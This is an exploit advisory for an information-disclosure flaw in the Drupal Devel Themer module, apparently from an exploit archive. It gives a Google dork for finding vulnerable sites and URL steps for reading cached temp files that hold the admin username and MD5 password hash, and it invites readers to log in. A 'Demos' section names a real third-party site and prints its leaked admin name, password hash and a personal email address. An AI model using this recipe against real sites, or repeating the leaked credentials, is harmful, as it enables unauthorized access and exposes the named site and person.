facebook facebook twitter rss

drupal devel themer tmp cache admin information disclosured

Author: xMjahd , Published: 30-04-2014
###########################################################################

[~] Exploit Title: devel themer tmp cache admin information disclosured

[~] Date: 02-12-2013

[~] Author: xMjahd ; xMjahd(at)gmail(dot)com

[~] Vendor Homepage: https://drupal.org/project/devel_themer

[~] Category: webapps/php

[~] Version: Requires at least: 6.x/Tested up to: 7.x/Tested

[~] Tested on: Windows

###########################################################################
# informations

Theme developer module for Drupal 6 ,This module is called Theme developer.
Theme Developer relies on the Devel module as a dependency.
Once enabled, you may click on any part of the page and a sexy popup display shows which
theme function/template outputted the HTML, and what other files could have done so. Armed with this info,
a themer may quickly and accurately override the presentation.
Further, all the variables passed into the template/function are presented for review
....

# Screenshots


https://drupal.org/files/devel_themer_popup.jpg
https://drupal.org/files/devel_theme_snap-1.jpg


# Exploit

well The problem on that Modules is when its runing he let a cache on tmp whers like action logs of administration
whers information like admin username and password (md5).

# Screenshots

http://www.yakamar.com/up/uploads/images/yakamar.com-961c3af771.png
http://www.yakamar.com/up/uploads/images/yakamar.com-795d2dba9f.png
http://www.yakamar.com/up/uploads/images/yakamar.com-58b12f674b.png

# Live
https://www.youtube.com/watch?v=iDC8xkeAcmM

# p0c
1 - Google Dork:"/modules/devel_themer/‎"

2 - Step1:http://server/[path]/sites/default/files/tmp/

3 - Step2:http://server/[path]/sites/default/files/tmp/devel_themer_xxxxxxxxxxxxxxxxxx

Read The tmp devel themer cache and try to found admin informarion (user/password) than login and enjoy :D

# Demos

http://www.pio-prevenzione-tumori.ispo.toscana.it/sites/default/files/tmp/
http://www.pio-prevenzione-tumori.ispo.toscana.it/sites/default/files/tmp/devel_themer_152227234c21efe6648ef
"{s:3:"uid";s:1:"1";s:4:"name";s:14:"amministratore";s:4:"pass";s:32:"b2ec44c2ac00cbff2083fc9d9d7d2f40";s:4:"mail";s:25:"alessio.piazza@demade.net";"

Greet's To all Freinds

[~] Made in Morocco ;p Santacruz .
[~] xMjahd(at)gmail(dot)com


__ __ _ _ _
__ _| \/ |(_) __ _| |__ __| |
\ \/ / |\/| || |/ _` | '_ \ / _` |
> <| | | || | (_| | | | | (_| |
/_/\_\_| |_|/ |\__,_|_| |_|\__,_|
|__/
###########################################################################
Youtube Tut
https://www.youtube.com/watch?v=iDC8xkeAcmM
###########################################################################

Like us on Facebook :